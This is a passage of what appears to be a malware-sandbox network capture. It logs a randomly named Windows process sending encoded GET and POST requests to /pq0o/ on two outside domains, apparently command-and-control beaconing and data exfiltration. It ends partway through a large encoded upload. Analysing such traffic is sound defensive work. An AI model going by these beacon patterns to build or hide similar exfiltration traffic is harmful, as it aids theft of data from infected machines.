db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 fc ce ca f1 9c 2f 2e 1f e1 17 03 33 d4 70 20 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 15fuRN0G$,V;/{]b\]\|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D\|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49771	103.168.172.37	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:03.345491886 CEST	365	OUT	GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=NMNyNvSWAQl+XC9g7rBusjWgWNBgohatDhvK1KIHhjj0aHE/UrTu3yYXFvlKPRx40FckhBe9K4BGmhcAc+bYC4VcVVEG0KUeJFitahxkTU5y9cpDhM+xwHc= HTTP/1.1 Host: www.celebration24.co.uk Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 24, 2024 09:23:03.568514109 CEST	796	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 24 Apr 2024 07:23:03 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 544 Connection: close x-backend: web1 X-Frontend: frontend1 X-Trace-Id: ti_16a8c42446ad6860b49f11dbac5edcfa Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49772	213.171.195.105	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:09.103707075 CEST	617	OUT	POST /pq0o/ HTTP/1.1 Host: www.holein1sa.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.holein1sa.com Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.holein1sa.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 42 4d 7a 71 49 64 72 63 43 47 6a 63 4f 69 32 33 79 59 45 67 36 35 7a 77 33 52 69 79 68 6f 70 6d 61 78 37 55 6d 4c 68 67 56 62 61 2b 78 39 73 58 56 42 33 7a 58 2b 48 56 77 59 52 74 76 31 6f 33 44 53 67 51 68 63 36 57 71 6f 51 42 7a 56 4f 51 61 72 32 55 44 63 31 43 61 65 73 73 6b 4d 4b 65 45 6b 45 7a 63 48 46 52 6d 72 62 36 57 73 50 36 62 63 43 37 30 71 68 67 6e 72 4d 6d 4b 45 35 49 63 2b 73 4e 58 64 6b 6b 55 37 39 7a 59 64 78 47 45 66 47 46 74 32 6b 73 6a 6f 73 6d 44 4f 73 57 74 6f 71 4a 46 6e 32 42 53 71 64 58 4b 58 61 31 64 34 42 79 6d 59 64 68 73 30 42 62 52 47 78 74 41 41 3d 3d Data Ascii: F49hs=BMzqIdrcCGjcOi23yYEg65zw3Riyhopmax7UmLhgVba+x9sXVB3zX+HVwYRtv1o3DSgQhc6WqoQBzVOQar2UDc1CaesskMKeEkEzcHFRmrb6WsP6bcC70qhgnrMmKE5Ic+sNXdkkU79zYdxGEfGFt2ksjosmDOsWtoqJFn2BSqdXKXa1d4BymYdhs0BbRGxtAA==
Apr 24, 2024 09:23:09.396332979 CEST	711	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.1 Date: Wed, 24 Apr 2024 07:23:09 GMT Content-Type: text/html Content-Length: 559 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49773	213.171.195.105	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:11.935106993 CEST	637	OUT	POST /pq0o/ HTTP/1.1 Host: www.holein1sa.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.holein1sa.com Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.holein1sa.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 42 4d 7a 71 49 64 72 63 43 47 6a 63 49 44 47 33 2b 62 38 67 76 70 7a 7a 79 52 69 79 7a 6f 70 39 61 77 48 55 6d 4f 52 77 56 6f 75 2b 78 64 63 58 61 6b 44 7a 61 65 48 56 6f 49 52 6f 72 31 6f 73 44 53 39 76 68 65 75 57 71 73 34 42 7a 55 2b 51 62 61 32 58 52 63 31 4d 42 75 73 69 72 73 4b 65 45 6b 45 7a 63 48 52 76 6d 72 44 36 56 63 66 36 62 34 33 74 39 4b 68 2f 67 72 4d 6d 41 6b 35 45 63 2b 73 37 58 63 34 4b 55 35 46 7a 59 59 4e 47 45 4c 79 47 6e 32 6b 32 2b 34 74 61 48 2b 74 30 6c 5a 48 68 4c 31 65 68 62 37 70 52 50 52 4c 76 4d 4a 67 6c 30 59 35 53 78 7a 49 76 63 46 4d 6b 62 4c 35 42 71 4a 4c 6e 71 63 51 72 42 5a 47 46 32 67 4f 65 6e 6c 67 3d Data Ascii: F49hs=BMzqIdrcCGjcIDG3+b8gvpzzyRiyzop9awHUmORwVou+xdcXakDzaeHVoIRor1osDS9vheuWqs4BzU+Qba2XRc1MBusirsKeEkEzcHRvmrD6Vcf6b43t9Kh/grMmAk5Ec+s7Xc4KU5FzYYNGELyGn2k2+4taH+t0lZHhL1ehb7pRPRLvMJgl0Y5SxzIvcFMkbL5BqJLnqcQrBZGF2gOenlg=
Apr 24, 2024 09:23:12.228837013 CEST	711	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.1 Date: Wed, 24 Apr 2024 07:23:12 GMT Content-Type: text/html Content-Length: 559 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49774	213.171.195.105	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:14.768378973 CEST	10719	OUT	POST /pq0o/ HTTP/1.1 Host: www.holein1sa.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.holein1sa.com Content-Length: 10302 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.holein1sa.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 42 4d 7a 71 49 64 72 63 43 47 6a 63 49 44 47 33 2b 62 38 67 76 70 7a 7a 79 52 69 79 7a 6f 70 39 61 77 48 55 6d 4f 52 77 56 6f 32 2b 78 4f 55 58 62 44 76 7a 62 65 48 56 32 59 52 70 72 31 70 30 44 53 31 6a 68 65 6a 74 71 75 41 42 79 32 32 51 50 2b 69 58 62 63 31 4d 4a 4f 73 6a 6b 4d 4b 50 45 6c 30 33 63 48 42 76 6d 72 44 36 56 65 58 36 53 4d 44 74 2f 4b 68 67 6e 72 4d 71 4b 45 35 6f 63 2b 30 46 58 63 38 30 55 49 6c 7a 59 38 52 47 44 2b 47 47 72 32 6b 77 2f 34 74 43 48 2b 68 43 6c 5a 4c 44 4c 31 47 48 62 37 64 52 50 6e 61 51 52 72 52 79 6f 37 39 79 72 42 67 78 64 69 34 63 63 35 52 4e 74 61 62 6c 79 4f 52 49 44 2b 6e 38 67 69 2f 59 6c 67 52 39 54 48 54 44 36 4f 49 39 31 54 66 5a 55 6d 2f 31 62 79 43 6c 75 30 73 30 4e 78 63 2f 4a 61 52 49 38 42 47 65 72 2b 4f 39 32 4a 39 6b 49 65 6e 57 43 6f 5a 51 7a 47 74 61 54 30 62 37 38 53 53 50 4e 50 50 6c 35 72 72 33 68 69 58 4c 37 6d 45 4e 35 2f 4f 59 36 68 2f 6f 33 72 37 63 74 75 6d 35 32 59 53 4c 4f 49 59 32 45 32 34 5a 73 54 56 6c 58 52 59 48 52 55 54 71 76 61 49 36 67 32 4b 58 74 62 4e 4b 35 54 44 75 61 5a 2f 68 47 67 57 67 35 39 4f 56 61 68 6c 41 59 31 59 61 36 56 2b 46 51 64 44 73 68 73 46 30 52 42 37 39 32 6a 35 31 61 79 32 49 75 56 7a 59 51 36 68 6e 2f 6d 4e 53 7a 4d 6d 4c 67 54 6e 6c 43 69 47 6b 41 71 74 44 35 70 50 49 42 70 78 34 70 43 75 2b 4c 59 54 33 70 4d 77 70 36 65 77 71 47 72 68 4c 46 48 45 6a 76 47 2f 38 52 59 4d 47 44 30 74 49 39 77 78 6b 35 43 42 38 56 6d 79 44 77 59 46 72 79 54 79 33 58 59 4c 52 4f 62 57 30 68 34 34 31 58 57 54 45 75 51 33 56 34 36 41 4e 6f 6b 6f 53 6f 30 47 30 62 79 6c 57 48 4b 44 79 73 43 42 5a 69 43 35 78 78 74 50 35 79 4a 78 37 6b 68 53 71 71 31 75 2f 30 2b 6d 6d 37 46 51 44 77 53 45 67 59 52 45 47 47 75 44 6d 70 5a 6a 48 54 61 50 59 34 65 66 61 59 78 61 49 32 79 61 67 78 4e 4e 56 59 56 51 47 52 6b 65 4c 76 6b 63 77 65 4c 72 49 49 41 4a 33 51 4d 6b 79 4b 6b 55 62 63 6f 75 49 2b 6f 68 6b 5a 47 71 62 4d 6a 46 52 58 63 4a 6e 6b 76 76 4b 70 73 36 64 35 43 66 30 31 35 64 41 69 59 48 74 52 4e 62 79 4f 47 4c 46 4f 55 4b 54 2f 5a 76 70 59 59 72 30 57 36 54 71 47 31 75 79 31 2f 62 34 74 33 77 58 70 57 41 37 65 48 72 6f 6a 4a 6a 4a 48 51 48 48 4c 6e 6f 35 48 77 57 79 64 53 63 39 6a 4c 54 77 6e 66 57 6b 52 77 65 59 4e 72 77 51 33 2f 42 49 5a 6d 37 4e 2b 6a 47 37 76 70 58 63 4d 78 6c 36 30 58 50 51 77 38 58 37 56 49 58 4d 78 4e 76 6f 30 6e 58 75 2b 77 37 73 77 32 42 64 78 43 6a 70 36 47 64 53 4b 52 76 43 47 68 39 44 67 7a 48 74 41 56 4a 66 67 39 52 54 57 64 69 7a 6e 67 6d 6c 32 51 44 55 45 6b 64 38 32 46 47 54 71 42 4d 32 51 68 6d 45 66 4e 69 74 41 7a 57 78 67 47 4e 54 65 7a 77 2f 4d 68 69 4e 4b 70 61 79 35 35 51 44 36 45 37 2f 32 37 41 61 33 35 64 53 6b 73 6f 6d 73 58 62 32 39 50 76 73 69 4a 78 56 74 50 77 48 6e 61 70 75 41 6d 4c 72 64 2f 6a 57 63 58 42 72 4d 6d 51 66 44 6b 2b 66 79 6a 49 67 68 48 42 66 79 30 50 49 43 2b 73 45 57 34 55 38 70 51 67 61 77 38 65 51 2b 67 4e 4e 55 72 78 42 78 66 36 6c 43 42 79 41 58 4c 48 76 49 78 46 6c 2f 79 46 38 6c 2b 66 31 34 41 37 51 33 59 73 63 6c 74 4a 4b 48 4f 71 75 61 37 58 6e 2b 53 44 37 70 4d 4b 71 66 7a 64 59 77 66 50 2b 39 43 32 49 4c 63 72 2f 45 33 72 56 42 65 78 79 4a 4a 58 70 2b 67 30 77 4e 4b 6a 31 32 78 32 7a 6d 6f 58 35 46 49 37 4d 43 68 38 62 49 34 37 6f 68 54 56 78 76 2b 37 62 2f 37 41 65 61 71 33 68 4f 6f 61 44 5a 6f 74 54 45 46 36 48 6b 61 6e 58 6d 6c 73 4d 59 45 54 59 37 76 55 4f 6f 64 4e 6b 34 39 70 45 6b 50 32 2f 68 42 71 36 51 35 7a 75 74 66 42 61 47 77 30 58 48 68 51 61 34 2b 6b 65 73 66 75 64 78 2f 46 65 6f 50 46 36 4d 63 32 4b 31 79 37 6a 6e 4a 75 52 79 4b 53 36 78 64 7a 42 41 32 34 68 34 46 6e 42 74 6e 6f 30 50 56 6d 54 4d 4c 4b 49 73 70 76 64 32 31 61 49 4c 52 4e 44 73 4e 4d 37 50 2b 74 6b 37 35 68 30 33 48 53 70 4b 54 34 6c 70 53 78 67 79 63 36 78 31 37 4d 57 47 6d 46 4c 7a 4b 62 76 76 47 56 57 59 7a 46 63 78 69 39 50 71 68 34 52 54 65 35 36 49 34 45 42 6a 53 32 57 67 38 75 4d 63 38 53 4d 57 73 6d 41 41 46 63 4d 52 44 4e 37 35 70 55 35 34 41 35 58 54 69 6a 78 4a 6d 4f 70 77 47 51 45 68 39 69 6d 65 74 5a 6f 6b 62 71 4c 31 42 50 66 7a 49 57 6a 4a 78 71 47 4a 58 4b 62 32 Data Ascii: F49hs=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